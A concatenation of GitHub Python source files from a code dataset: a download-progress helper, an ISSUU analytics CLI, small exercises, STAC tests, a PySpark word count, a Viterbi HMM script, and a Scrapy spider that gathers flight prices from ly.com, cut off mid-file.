False, it will return only the bytes in numbers.\n\n precise (``bool``, *optional*):\n If True, it will return you want the precise time.\n if False, it will return only in human understanding format.\n ``human`` required.\n\n Raises:\n TypeError: In case of using precise mode without human mode.\n\n Returns:\n ``int``: If human mode is disabled.\n ``str``: If human mode is enabled.\n \"\"\"\n\n try:\n time = datetime.timedelta(\n seconds=(self.get_size_total() - self.get_size_downloaded())\n / self.get_speed()\n )\n except ZeroDivisionError:\n time = datetime.timedelta(seconds=0)\n\n return self._human_precise(precise, human, time)\n\n def _human_precise(self, precise, human, time):\n if precise and not human:\n raise TypeError(\"To get accurate time, activate human mode\")\n if human:\n if precise:\n return humanize.precisedelta(time)\n else:\n return humanize.naturaltime(time)\n return time\n\n def is_finished(self) -> bool:\n \"\"\"Checks whether the download has been completed.\n\n Returns:\n ``bool``: True if the download has been finished.\n \"\"\"\n\n return self.get_status() in [\"failed\", \"finished\", \"ready\", \"stopped\"]\n\n def is_success(self) -> bool:\n \"\"\"Checks whether the download was successful.\n\n Raises:\n :obj:`aiodown.erros.ProgressError`: If the download has not yet finished.\n\n Returns:\n ``bool``: True if the download was a success.\n \"\"\"\n\n if not self.is_finished():\n raise ProgressError()\n\n return self.get_status == \"finished\"\n\n def __repr__(self) -> str:\n \"\"\"Get some download details.\n\n Returns:\n ``str``: Some download details.\n \"\"\"\n\n return f\"{self.__class__.__name__}(id={self.get_id()}, url={self.get_url()}, path={self.get_file_path()}, name={self.get_file_name()}, status={self.get_status()})\"\n\n def __str__(self) -> Callable:\n \"\"\"Get some download details.\n\n Returns:\n ``str``: Some download details.\n \"\"\"\n\n return self.__repr__()\n","repo_name":"AmanoTeam/aiodown","sub_path":"aiodown/types/download.py","file_name":"download.py","file_ext":"py","file_size_in_byte":17081,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"70154655208","text":"# libraries imports\nimport argparse\nimport time\n\n# local imports\nfrom classes.exception.UnknownInputException import UnknownInputException\nfrom classes.ISSUU.IssuuFactory import IssuuFactory\n\nif __name__ == \"__main__\":\n\n # Construct the argument parser\n ap = argparse.ArgumentParser()\n\n # Add the arguments to the parser\n ap.add_argument(\"-u\", \"--user_uuid\",\n help=\"Input for the user UUID\")\n\n ap.add_argument(\"-d\", \"--doc_uuid\",\n help=\"Input for the document UUID\")\n\n ap.add_argument(\"-t\", \"--task_id\", required=True, choices=['2a', '2b', '3a', '3b', '4d', '5', '6'],\n help=\"\"\"\n Input for the task_id. Can take value in (2a, 2b, 3a, 3b, 4d, 5, 6) where:\n - 2a: Opens an horizontal bar chart of the count of document views by country\n - 2b: Opens an horizontal bar chart of the count of document views by continent\n - 3a: Opens an horizontal bar chart of the count of document views by browser with raw names\n - 3b: Opens an horizontal bar chart of the count of document views by browser with cleaned names\n - 4d: Generates an also-like list from the doc_id and user_id (optional)\n - 5: Generates an also-likes graph from the doc_id and user_id (optional)\n - 6: launches the GUI\n \n \"\"\")\n\n ap.add_argument(\"-f\", \"--filename\", required=True,\n help=\"Input for the name of the JSON file database\")\n \n args = vars(ap.parse_args()) \n\n print(\"Creating factory..\")\n f = IssuuFactory()\n print(\"Loading dataset..\")\n start = time.time()\n ds = f.load_dataset(path=args[\"filename\"])\n end = time.time()\n print(f\"Dataset of {ds.size()} elements loaded in {round(end - start, 4)} seconds..\")\n op = f.get_operator(ds)\n print(\"Operator loaded..\")\n\n if (args[\"task_id\"] == '2a'):\n if (args[\"doc_uuid\"] is not None):\n op.view_by_country(args[\"doc_uuid\"])\n else:\n print(\"Document ID parameter missing.. Interrupting execution\")\n elif (args[\"task_id\"] == '2b'):\n if (args[\"doc_uuid\"] is not None):\n op.view_by_continent(args[\"doc_uuid\"])\n else:\n print(\"Document ID parameter missing.. Interrupting execution\")\n elif (args['task_id'] == '3a'):\n op.view_by_browser()\n elif (args[\"task_id\"] == \"3b\"):\n op.view_by_browser(simplified=True)\n elif (args[\"task_id\"] == \"4d\"):\n if (args[\"doc_uuid\"] is not None):\n print(op.also_likes(args[\"doc_uuid\"], args[\"user_uuid\"], plot=False))\n else:\n print(\"Document ID parameter missing.. Interrupting execution\")\n elif (args[\"task_id\"] == \"5\"):\n if (args[\"doc_uuid\"] is not None):\n op.also_likes(args[\"doc_uuid\"], args[\"user_uuid\"], plot=True)\n else:\n print(\"Document ID parameter missing.. Interrupting execution\")\n elif (args[\"task_id\"] == \"6\"):\n gui = f.launch_GUI(op, args[\"doc_uuid\"], args[\"user_uuid\"])\n print(\"Loading gui..\")\n gui.show()\n else:\n raise UnknownInputException()","repo_name":"dimartinot/Data-Analysis-of-a-document-tracker","sub_path":"cw2.py","file_name":"cw2.py","file_ext":"py","file_size_in_byte":3012,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"37983253244","text":"# for element in range(1,21):\n# print(element)\n\n\n# lista =[1,2,4,5,6,7]\n\n# for element in lista:\n# print(element)\n\nproducto = {\n \"nombre\" :\"camisa\",\n \"precio\" : 100,\n \"stock\" : 20\n} \n\nprint(producto)\n\n# for key in producto:\n# print(key, \"=>\", producto[key])\n\nfor key, value in producto.items():\n print(key, '=>', value)","repo_name":"jbenavidesnati05/python-sab-cesde","sub_path":"for.py","file_name":"for.py","file_ext":"py","file_size_in_byte":356,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"25380014092","text":"import unittest\n\nfrom stactools.aerial import stac\nfrom tests import test_data\n\n\nclass StacTest(unittest.TestCase):\n\n def test_create_collection(self):\n collection = stac.create_collection()\n collection.set_self_href(\"\")\n\n self.assertEqual(collection.id, \"test-aerial-imagery\")\n self.assertEqual(collection.extent.spatial.to_dict()[\"bbox\"],\n [[-180., 90., 180., -90.]])\n\n collection.validate()\n\n def test_create_item(self):\n path = test_data.get_external_data(\"EO_20190308.1618_11.tif\")\n item = stac.create_item(path)\n\n self.assertEqual(item.id, \"EO_20190308.1618_11\")\n\n item.validate()\n","repo_name":"pjhartzell/aerial","sub_path":"tests/test_stac.py","file_name":"test_stac.py","file_ext":"py","file_size_in_byte":680,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"24166670798","text":"\nfrom pyspark import SparkContext, SparkConf\n\nsc = SparkContext()\n\nlines = sc.textFile(\"/tmp/word_count.txt\")\nline = lines.flatMap(lambda s: s.split(\" \")).map(lambda s: (s,1)).reduceByKey(lambda a, b: a+b)\n\nprint(line.collect())\nline.saveAsTextFile(\"/tmp/word\")","repo_name":"SunilKumarGarg/Spark","sub_path":"python/wordCount.py","file_name":"wordCount.py","file_ext":"py","file_size_in_byte":261,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"20765074294","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Mon Oct 21 08:27:28 2019\r\n\r\n@author: Labmirp\r\n\"\"\"\r\nsqn=('GGCACTGAA')\r\nestados = ('H', 'L')\r\nprobInicio = {'H': 0.5, 'L': 0.5}\r\nprobTrans = {'H' : {'H': 0.5, 'L': 0.5}, 'L' : {'H': 0.4, 'L': 0.6}}\r\nprobEmision = {'H' : {'A': 0.2, 'C': 0.3, 'G': 0.3, 'T':0.2}, \r\n 'L' : {'A': 0.3, 'C': 0.2, 'G': 0.2, 'T':0.3}}\r\n\r\nif len(sqn)!=0:\r\n res = [{}]\r\n # Probabilidades de Inicio\r\n for e in estados:\r\n probabilidad=probInicio[e] * probEmision[e][sqn[0]] \r\n estadoPrevio=None\r\n res[0][e] = {\"prob\":probabilidad , \"prev\": estadoPrevio}\r\n # Probabilidades Después del Inicio\r\n for i in range(1, len(sqn)):\r\n res.append({})\r\n for e in estados:\r\n \r\n ProbEstadoH=res[i-1][estados[0]][\"prob\"]*probTrans[estados[0]][e]\r\n ProbEstadoL=res[i-1][estados[1]][\"prob\"]*probTrans[estados[1]][e]\r\n \r\n if ProbEstadoH>ProbEstadoL:\r\n maxProbTrans=ProbEstadoH\r\n prev_e='H'\r\n else:\r\n maxProbTrans=ProbEstadoL\r\n prev_e='L'\r\n \r\n prob = maxProbTrans * probEmision[e][sqn[i]]\r\n res[i][e] = {\"prob\": prob, \"prev\": prev_e}\r\n # Encontrar Máxima Probabilidad\r\n maxProb=0\r\n for e in estados:\r\n current_p=res[-1][e][\"prob\"]\r\n if current_p>maxProb:\r\n prev_e=e\r\n maxProb=current_p;\r\n # Encontrar la Ruta \r\n out=[]\r\n for i in range(len(res) - 2, -1, -1):\r\n out.insert(0, res[i + 1][prev_e][\"prev\"])\r\n previous = res[i + 1][prev_e][\"prev\"]\r\n\r\n print('La ruta más probable es: ')\r\n for o in out:\r\n print(o+\" \",end=\"\")\r\n print(\"\") \r\n print('Con una probabilidad de: '+str(maxProb)) \r\n \r\n \r\n\r\n \r\nelse:\r\n print('La secuencia eeá vacía')\r\n \r\n","repo_name":"rfrancoce/LD_HMM","sub_path":"HMM/Viterbi.py","file_name":"Viterbi.py","file_ext":"py","file_size_in_byte":1882,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"14597692511","text":"# -*- coding: utf-8 -*-\r\n# 爬取艺龙网机票信息\r\nimport datetime\r\nimport json\r\nimport os\r\nimport sys\r\nimport time\r\nimport traceback\r\n\r\nimport random\r\nimport pytz\r\nimport scrapy\r\nimport httpx\r\nfrom httpx._config import SSLConfig\r\nfrom flight_spider.ylutils.excel_read import get_airport, get_full_airport, get_city_from_airport\r\nfrom flight_spider.ylutils.ylLog import YlLog\r\nfrom flight_spider.ylutils.ylFile import YlFile\r\nfrom flight_spider.redisUtil import RedisUtil\r\nfrom flight_spider.settings import user_agent_mobile\r\nfrom flight_spider.YlSpiderItem import YlSpiderItem, YlBatchItem\r\nimport urllib.parse as up\r\nfrom flight_spider.ylutils.ip_map import ip_map\r\nimport csv\r\nfrom collections import defaultdict\r\n\r\n\r\nclass YlSpider06(scrapy.Spider):\r\n name = 'ylSpider06'\r\n allowed_domains = ['www.ly.com']\r\n start_urls = ['https://www.ly.com/']\r\n\r\n # redis_key = 'yl:start_urls'\r\n\r\n def __init__(self, *args, **kwargs):\r\n super().__init__(*args, **kwargs)\r\n scrapy.Spider.__init__(self, self.name)\r\n self.file_name = kwargs.get('file_name')\r\n self.from_line = kwargs.get('from_line')\r\n self.to_line = kwargs.get('to_line')\r\n self.from_date = kwargs.get('from_date')\r\n self.to_date = kwargs.get('to_date')\r\n self.is_low_price = kwargs.get('is_low_price')\r\n self.task_time = datetime.datetime.strftime(datetime.datetime.now(), \"%Y-%m-%d %H:00:00\")\r\n # self.task_time = kwargs.get('task_time') + '0'\r\n # 当前时间\r\n self.now_date = datetime.datetime.strftime(datetime.datetime.now(), \"%Y-%m-%d\")\r\n self.ylLog = YlLog()\r\n self.ylFile = YlFile(os.path.abspath('.'))\r\n self.redisUtil = RedisUtil()\r\n self.start_time = None\r\n self.end_time = None\r\n self.success, self.total, self.fail, self.count, self.exception, self.success_lowest = 0, 0, 0, 0, 0, 0\r\n print(self.file_name, self.from_line, self.to_line, self.from_date, self.to_date, self.is_low_price,\r\n self.task_time)\r\n self.base_path = os.path.abspath('.')\r\n # 一市两场\r\n self.airport_map = {\r\n \"PEK\": \"PEK\",\r\n \"PKX\": \"PEK\",\r\n \"PVG\": \"PVG\",\r\n \"SHA\": \"PVG\",\r\n \"CTU\": \"CTU\",\r\n \"TFU\": \"CTU\",\r\n \"ZYI\": \"ZYI\",\r\n \"WMT\": \"WMT\",\r\n }\r\n # 一市两场三字码\r\n self.air_list = [\"PEK\", \"PKX\", \"PVG\", \"SHA\", \"CTU\", \"TFU\", \"ZYI\", \"WMT\"]\r\n self.flight_infos = {}\r\n\r\n @property\r\n def get_seconds(self) -> int:\r\n datetime_object = datetime.datetime.now()\r\n now_timetuple = datetime_object.timetuple()\r\n now_second = time.mktime(now_timetuple)\r\n mow_millisecond = int(now_second * 1000 + datetime_object.microsecond / 1000)\r\n return mow_millisecond\r\n\r\n # 判断字典中父节点是否有子节点\r\n def has_node(self, data: dict, node: str):\r\n for k, v in data.items():\r\n if node == k:\r\n return True\r\n else:\r\n continue\r\n return False\r\n\r\n def switch_ele(self, collection: list, index1: int, index2: int):\r\n mid = collection[index1]\r\n collection[index1] = collection[index2]\r\n collection[index2] = mid\r\n\r\n def get_headers_2(self, gnjpapphead, ua, link_tracker_id, session_id, cookies):\r\n headers = {\r\n \"Host\": \"m.ly.com\",\r\n \"Connection\": \"keep-alive\",\r\n \"Content-Type\": \"application/json\",\r\n \"tcplat\": str(gnjpapphead['tcplat']),\r\n \"Origin\": \"https://m.ly.com\",\r\n \"auth\": \"true\",\r\n \"User-Agent\": ua,\r\n \"tcversion\": str(gnjpapphead['tcversion']),\r\n \"tcuserid\": \"\",\r\n \"Accept\": \"application/json, text/plain, */*\",\r\n \"tcopenid\": \"\",\r\n # \"cache-control\": \"no-cache\",\r\n \"tctracerid\": link_tracker_id,\r\n \"tcbusiness\": \"true\",\r\n \"tcsectoken\": \"\",\r\n \"tcsessionid\": session_id,\r\n \"Referer\": \"\",\r\n \"Accept-Encoding\": \"gzip, deflate, br\",\r\n \"Accept-Language\": \"zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6\",\r\n \"Cookie\": cookies,\r\n }\r\n return headers\r\n\r\n def get_headers_1(self, tcp_plat, ua, tcversion, tctracer_id, server_session_id, cookies):\r\n headers = {\r\n \"Host\": \"m.ly.com\",\r\n \"Connection\": \"keep-alive\",\r\n \"Content-Type\": \"application/json\",\r\n \"tcplat\": str(tcp_plat),\r\n \"Origin\": \"https://m.ly.com\",\r\n \"auth\": \"true\",\r\n \"User-Agent\": ua,\r\n \"tcversion\": tcversion,\r\n \"tcuserid\": \"\",\r\n \"Accept\": \"application/json, text/plain, */*\",\r\n \"tcopenid\": \"\",\r\n # \"cache-control\": \"no-cache\",\r\n \"tctracerid\": tctracer_id,\r\n \"tcbusiness\": \"true\",\r\n \"tcsectoken\": \"\",\r\n \"tcsessionid\": server_session_id,\r\n \"Referer\": \"\",\r\n \"Accept-Encoding\": \"gzip, deflate, br\",\r\n \"Accept-Language\": \"zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6\",\r\n \"Cookie\": cookies,\r\n }\r\n return headers\r\n\r\n def get_default_headers(self, url):\r\n headers = {\r\n \"Accept\": \"text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9\",\r\n \"Accept-Encoding\": \"gzip, deflate, br\",\r\n \"Accept-Language\": \"zh-CN,zh;q=0.9\",\r\n \"Cache-Control\": \"max-age=0\",\r\n \"Connection\": \"keep-alive\",\r\n \"Host\": url.split(\"://\")[-1].replace(\"/\", \"\"),\r\n \"User-Agent\": \"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36\",\r\n }\r\n return headers\r\n\r\n '''\r\n @Description: 冒泡排序,加入flag判断数组是否有序\r\n '''\r\n\r\n def bubble_sort(self, collection: list):\r\n flags = 0\r\n for i, economy_cabin in enumerate(collection):\r\n for j in range(0, len(collection) - 1 - i):\r\n # 遍历,将价格最小的对象排在列表第一个(冒泡)\r\n if int(collection[i]['SellPrice']) > int(collection[i + 1]['SellPrice']):\r\n self.switch_ele(collection, j, j + 1)\r\n # 不是有序的,flags设置为1\r\n flags = 1\r\n elif flags == 0:\r\n return\r\n else:\r\n continue\r\n\r\n # 从cookie中取得请求体需要的参数\r\n def get_cookie_params(self, cookies: str):\r\n global session_id, link_tracker_id, gnjpapphead\r\n _cookies = cookies.split(\";\")\r\n for coo in _cookies:\r\n key = coo.split(\"=\")[0].strip()\r\n value = coo.split(\"=\")[1].strip()\r\n if key.__eq__(\"serverSessionId\"):\r\n session_id = value\r\n elif key.__eq__(\"traceid\"):\r\n link_tracker_id = value\r\n elif key.__eq__(\"gnjpapphead\"):\r\n gnjpapphead = eval(up.unquote(value))\r\n return session_id, link_tracker_id, gnjpapphead\r\n\r\n '''\r\n @Description: 读取传参,开启请求\r\n '''\r\n\r\n def start_requests(self):\r\n # 初始化变量\r\n global cookies, gnjpapp_head, server_session_id\r\n self.start_time = time.time()\r\n gnjpapp_head = None\r\n server_session_id = \"\"\r\n cookies = \"\"\r\n list = []\r\n with open(f\"{self.file_name}\", \"r\", encoding='utf-8') as f:\r\n for line in f:\r\n line = line.strip()\r\n line = eval(line)\r\n list.append(line)\r\n\r\n if int(self.from_line) == -1 or int(self.to_line) == -1:\r\n file_line = list\r\n else:\r\n file_line = list[(int(self.from_line) - 1):int(self.to_line)]\r\n\r\n for i, li in enumerate(file_line):\r\n from_city = li['from_city_name']\r\n to_city = li['to_city_name']\r\n from_city_code = li['from_city_code']\r\n to_city_code = li['to_city_code']\r\n # 北京地区做特殊处理\r\n _to_city_code = \"BJS\" if to_city.__eq__(\"北京\") else to_city_code\r\n _from_city_code = \"BJS\" if from_city.__eq__(\"北京\") else from_city_code\r\n # 重庆武隆做特殊处理\r\n from_city = \"重庆\" if from_city.__eq__(\"武隆\") else from_city\r\n to_city = \"重庆\" if to_city.__eq__(\"武隆\") else to_city\r\n now_time = time.strftime(\"%F\")\r\n if int(self.from_date) == 0 and int(self.to_date) == 0:\r\n days = [0]\r\n elif int(self.from_date) == -1 or int(self.to_date) == -1:\r\n days = range(15)\r\n else:\r\n days = range(int(self.from_date), (int(self.to_date) + 1))\r\n for j in days:\r\n\r\n flight_time = (datetime.datetime.strptime(now_time, \"%Y-%m-%d\") + datetime.timedelta(days=j)).strftime(\r\n \"%Y-%m-%d\")\r\n print(f\"***{flight_time}***\")\r\n _flight_time = datetime.datetime.strptime(flight_time, \"%Y-%m-%d\")\r\n ua = random.choice(user_agent_mobile)\r\n create_time = datetime.datetime.now(pytz.timezone('Asia/Shanghai')).strftime(\r\n '%Y-%m-%d %H:%M:%S')\r\n metadata = {\"from_city\": from_city, \"to_city\": to_city, \"from_city_code\": _from_city_code,\r\n \"to_city_code\": _to_city_code, \"index\": int(i + 1), \"flight_time\": flight_time,\r\n 'is_low_price': 0 if self.is_low_price == '0' else 1, 'dont_merge_cookies': True,\r\n 'create_time': create_time, 'user-agent': ua}\r\n # redis中是否已保存cookie\r\n if self.redisUtil.hash_exist_key(f\"ly:{self.now_date}-cookie\", \"cookies\"):\r\n cookies = str(self.redisUtil.get(f\"ly:{self.now_date}-cookie\", \"cookies\"), \"utf-8\")\r\n server_session_id, link_tracker_id, gnjpapp_head = self.get_cookie_params(cookies)\r\n tctracer_id = gnjpapp_head.get('tctracerid')\r\n tcp_plat = int(gnjpapp_head.get('tcplat'))\r\n current_milli_time = self.get_seconds\r\n server_session_id = f\"0-{current_milli_time}\" if server_session_id == \"\" else server_session_id\r\n tcversion = gnjpapp_head.get('tcversion')\r\n _from_city, _to_city = up.quote(from_city), up.quote(to_city)\r\n url = f\"https://m.ly.com/touchbook/touch/sbook1/{from_city_code}/{to_city_code}/{_from_city}/{_to_city}/{flight_time}?fromcitycode={_from_city_code}&tocitycode={_to_city_code}&childticket=0,0&fromairport=&toairport={to_city_code}&cabin=0&hasAirPort=3&RefId=10758821&bd_vid=\"\r\n headers = self.get_headers_1(tcp_plat, ua, tcversion, tctracer_id, server_session_id, cookies)\r\n headers['Referer'] = url\r\n # 获取sd\r\n sd_delta = datetime.timedelta(days=3)\r\n sd_date = _flight_time - sd_delta\r\n sd = sd_date.strftime(\"%Y-%m-%d\")\r\n # 获取ed\r\n ed_delta = datetime.timedelta(days=15)\r\n ed_date = _flight_time + ed_delta\r\n ed = ed_date.strftime(\"%Y-%m-%d\")\r\n form_data = {\r\n \"IsMuilteSite\": 1, \"aac\": \"\", \"acc\": _to_city_code, \"cabin\": 0, \"dac\": \"\",\r\n \"dcc\": _from_city_code,\r\n \"ddate\": flight_time, \"entrance\": 0,\r\n \"pc\": {\r\n \"sd\": sd,\r\n \"ed\": ed,\r\n },\r\n \"plat\": int(tcp_plat),\r\n \"pt\": 0\r\n }\r\n metadata['headers'], metadata['form_data'] = headers, form_data\r\n yield scrapy.FormRequest(\r\n url=\"https://m.ly.com/touchbook/flightApis/wx/flightquery/flights\",\r\n body=json.dumps(form_data).encode(\"utf-8\"), method=\"POST\",\r\n callback=self.parse_api, dont_filter=True, meta=metadata, headers=headers)\r\n else:\r\n self.ylLog.debug(\"cookie过期或者不存在\")\r\n sys.exit()\r\n\r\n '''\r\n @Description: 需要解析退改价格、托运行李额等数据,所以每个航班都需要callback到parse_lowest_price函数\r\n '''\r\n\r\n def parse_api(self, response):\r\n self.total += 1\r\n self.ylLog.info(f\"采集总次数:{self.total}\")\r\n print(\"res\", response)\r\n global cookies, gnjpapp_head, server_session_id\r\n gnjpapp_head, server_session_id, cookies = None, \"\", \"\"\r\n from_city = response.meta['from_city']\r\n to_city = response.meta['to_city']\r\n from_city_code = response.meta['from_city_code']\r\n to_city_code = response.meta['to_city_code']\r\n flight_time = response.meta['flight_time']\r\n _flight_time = datetime.datetime.strptime(flight_time, \"%Y-%m-%d\")\r\n userAgent = response.meta['user-agent']\r\n create_time = response.meta['create_time']\r\n headers = response.meta['headers']\r\n form_data = response.meta['form_data']\r\n # 北京地区做特殊处理\r\n _to_city_code = \"BJS\" if to_city.__eq__(\"北京\") else to_city_code\r\n _from_city_code = \"BJS\" if from_city.__eq__(\"北京\") else from_city_code\r\n # 重庆武隆做特殊处理\r\n from_city = \"重庆\" if from_city.__eq__(\"武隆\") else from_city\r\n to_city = \"重庆\" if to_city.__eq__(\"武隆\") else to_city\r\n if response.url == \"**\":\r\n self.fail += 1\r\n msg = f\"响应异常,OD为:{from_city}:{from_city_code}={to_city}:{to_city_code}>>>次数:{self.fail}\\n\"\r\n self.ylLog.exception(f\"{msg}\")\r\n if response.status in [200, 201]:\r\n self.count += 1\r\n self.ylLog.info(f\"成功返回页面>>>{self.count}\")\r\n self.ylLog.info(\"响应成功率: %4f\" % (self.count / self.total))\r\n try:\r\n data = json.loads(response.body.decode())\r\n # 判断当日是否有航班\r\n if self.has_node(data.get('body'), \"fpc\"):\r\n data_list = []\r\n flights = data['body']['fpc']\r\n count = 0\r\n for k, v in flights.items():\r\n if len(v) == 0:\r\n continue\r\n else:\r\n for flight in v:\r\n # 获取PhoenixRuleId\r\n phoenix_rule_id = str(flight['newLps']['PhoenixRuleId'])\r\n icsf = flight['icsf']\r\n # 通过icsf判断是否是共享航班,并且不是产品\r\n if not icsf:\r\n print(f\"phoenix_rule_id>>> {phoenix_rule_id}\")\r\n flight_transfer, flight_type, platform = \"\", \"\", \"yl\"\r\n # 需要退改价格等数据,需要请求每个航班详情数据\r\n count += 1\r\n start_time = flight['dt'].split(\" \")[1]\r\n end_time = flight['at'].split(\" \")[1]\r\n plane_no = flight['fn']\r\n company = flight['asn']\r\n _from_city_code = flight['dac']\r\n _to_city_code = flight['aac']\r\n from_airport_name = flight['dasn']\r\n to_airport_name = flight['aasn']\r\n _from_city = get_city_from_airport(\r\n str(from_airport_name),\r\n self.base_path) if _from_city_code == \"CQW\" else from_city\r\n _to_city = get_city_from_airport(\r\n str(to_airport_name),\r\n self.base_path) if _to_city_code == \"CQW\" else to_city\r\n from_city_airport = get_full_airport(_from_city_code, self.base_path)\r\n to_city_airport = get_full_airport(_to_city_code, self.base_path)\r\n print(\r\n f\"<<>>\")\r\n headers[\r\n 'Referer'] = f\"https://m.ly.com/kylintouch/sbook1_5?fromcitycode={from_city_code}&tocitycode={to_city_code}&childticket=0,0&fromairport{_from_city_code}=&toairport{_to_city_code}=&cabin=0&hasAirPort=3&RefId=10758821&bd_vid=\"\r\n # company_no = re.findall(\"^(.*?)\\d+\", str(plane_no), re.I)[0]\r\n company_no = str(plane_no)[0:2]\r\n plane_type = flight['amn']\r\n if self.has_node(flight, 'sc'):\r\n flight_transfer = flight['sc']\r\n flight_type = \"经停\"\r\n elif self.has_node(flight, \"ps\"):\r\n try:\r\n flight_transfer = flight['ps']['g5']['g5sc']\r\n except:\r\n flight_transfer = \"\"\r\n traceback.print_exc()\r\n flight_type = \"联程\"\r\n else:\r\n flight_transfer = \"\"\r\n flight_type = \"直飞\"\r\n metadata = {\r\n \"flight_transfer\": flight_transfer,\r\n \"flight_type\": flight_type,\r\n \"off_date\": flight_time,\r\n \"from_city\": _from_city,\r\n \"from_city_code\": _from_city_code,\r\n \"to_city\": _to_city,\r\n \"to_city_code\": _to_city_code,\r\n \"plane_no\": plane_no,\r\n \"company\": company,\r\n \"company_no\": company_no,\r\n \"platform\": platform,\r\n \"start_time\": start_time,\r\n \"end_time\": end_time,\r\n \"create_time\": create_time,\r\n \"plane_type\": plane_type,\r\n \"from_city_airport\": from_city_airport,\r\n \"to_city_airport\": to_city_airport,\r\n \"count\": count,\r\n }\r\n __data = self.parse_lowest_price(metadata)\r\n data_list.append(__data)\r\n # 产品价格与非产品价格一起返回,批量插入\r\n print(f\"爬取数据 -> 起飞时间: {flight_time} OD:{from_city}:{from_city_code}={to_city}:{to_city_code}航班数>>>{len(data_list)}\")\r\n names = ['company', 'company_no', 'plane_no', 'start_time', 'end_time', 'from_city', 'from_city_code', 'to_city', 'to_city_code', 'create_time', 'discount', 'off_date', 'platform', 'price', 'flight_type', 'plane_type', 'flight_transfer', 'from_city_airport', 'to_city_airport', 'task_time', 'server_ip', 'flight_number', 'lep_price', 'is_meal', 'baggage']\r\n # 将csv文件放入logs目录下\r\n csv_file = os.path.join(self.ylLog.second_path, fr\"{_from_city_code}-{_to_city_code}-{flight_time}-{ip_map[int(self.redisUtil.db)]}.csv\")\r\n print(\"***csv_file_name***\", csv_file)\r\n with open(csv_file, \"w+\", encoding=\"utf-8\", newline='') as f:\r\n f_csv = csv.writer(f)\r\n f_csv.writerow(names)\r\n f_csv.writerows(data_list)\r\n self.end_time = time.time()\r\n self.ylLog.info(f\"爬取耗时{self.end_time - self.start_time}\")\r\n msg = f\"起飞时间: {flight_time} OD:{from_city}:{from_city_code}={to_city}:{to_city_code}航班数>>>{count}\"\r\n self.ylLog.info(msg)\r\n item = YlBatchItem(\r\n from_city_code=_from_city_code,\r\n to_city_code=_to_city_code,\r\n off_date=flight_time,\r\n server_ip=ip_map[int(self.redisUtil.db)],\r\n csv_file_name=csv_file,\r\n flight_number=len(data_list),\r\n )\r\n yield item\r\n else:\r\n self.ylLog.info(f\"OD:{from_city}:{from_city_code}={to_city}:{to_city_code}航班数0\")\r\n pass\r\n except Exception as e:\r\n traceback.print_exc()\r\n path = \"/result/error_ua.txt\"\r\n self.ylFile.createFile(path, userAgent + '\\n')\r\n xmlpath = fr\"/result/{from_city}({from_city_code})-{to_city}({to_city_code})-{flight_time}-exception.html\"\r\n self.ylFile.createFile(xmlpath, response.body.decode(), model='w+')\r\n self.ylLog.info(f\"{xmlpath}写入源码文件成功\")\r\n pass\r\n else:\r\n self.fail += 1\r\n msg = f\"状态码异常>>>{self.fail}, 状态码: {response.status}\\n\"\r\n self.ylLog.exception(msg)\r\n path = fr\"/errorHtml/{from_city}-{to_city}-{flight_time}-status_error.html\"\r\n self.ylFile.createFile(path, response.body.decode())\r\n\r\n\r\n\r\n '''\r\n @Description: 是产品价格的一个航班就请求详情链接,从经济舱的所有价格中找出非产品价格的并找到最低价格放入管道\r\n '''\r\n\r\n def parse_lowest_price(self, meta_data: dict) -> list:\r\n global gnjpapp_head, server_session_id, link_tracker_id, lep_price\r\n gnjpapp_head, server_session_id, link_tracker_id, lep_price = None, \"\", \"\", None\r\n self.ylLog.info(\"***解析产品价格航班***\")\r\n from_city = meta_data['from_city']\r\n from_city_code = meta_data['from_city_code']\r\n to_city = meta_data['to_city']\r\n to_city_code = meta_data['to_city_code']\r\n off_date = meta_data['off_date']\r\n create_time = meta_data['create_time']\r\n plane_no = meta_data['plane_no']\r\n plane_type = meta_data['plane_type']\r\n start_time = meta_data['start_time']\r\n end_time = meta_data['end_time']\r\n flight_transfer = meta_data['flight_transfer']\r\n flight_type = meta_data['flight_type']\r\n company = meta_data['company']\r\n company_no = meta_data['company_no']\r\n platform = meta_data['platform']\r\n from_city_airport = meta_data['from_city_airport']\r\n to_city_airport = meta_data['to_city_airport']\r\n count = int(meta_data['count'])\r\n __from_city_code = self.airport_map[\r\n from_city_code] if from_city_code in self.air_list else from_city_code\r\n __to_city_code = self.airport_map[\r\n to_city_code] if to_city_code in self.air_list else to_city_code\r\n\r\n # redis中是否已保存cookie\r\n if self.redisUtil.hash_exist_key(f\"ly:{self.now_date}-cookie\", \"cookies\"):\r\n cookies = str(self.redisUtil.get(f\"ly:{self.now_date}-cookie\", \"cookies\"),\r\n \"utf-8\")\r\n server_session_id, link_tracker_id, gnjpapp_head = self.get_cookie_params(cookies)\r\n ua = random.choice(user_agent_mobile)\r\n form_data = {\r\n \"AirCode\": plane_no[0:2],\r\n \"Arrival\": __to_city_code,\r\n \"ArrivalName\": get_airport(to_city_code, self.base_path).encode(\r\n \"utf-8\").decode(\r\n \"latin1\"),\r\n \"Departure\": __from_city_code,\r\n \"DepartureDate\": off_date + \" \" + start_time,\r\n \"DepartureName\": get_airport(from_city_code,\r\n self.base_path).encode(\r\n \"utf-8\").decode(\r\n \"latin1\"),\r\n \"GetType\": \"0\",\r\n \"IsBaby\": 0,\r\n \"IsBook15\": 1,\r\n \"IsFromPhoenix\": 1,\r\n \"IsMuilteSite\": 1,\r\n \"ProductType\": \"1\",\r\n \"QueryType\": \"1\",\r\n \"SessionId\": session_id,\r\n \"TripType\": \"0\",\r\n \"flightno\": plane_no,\r\n 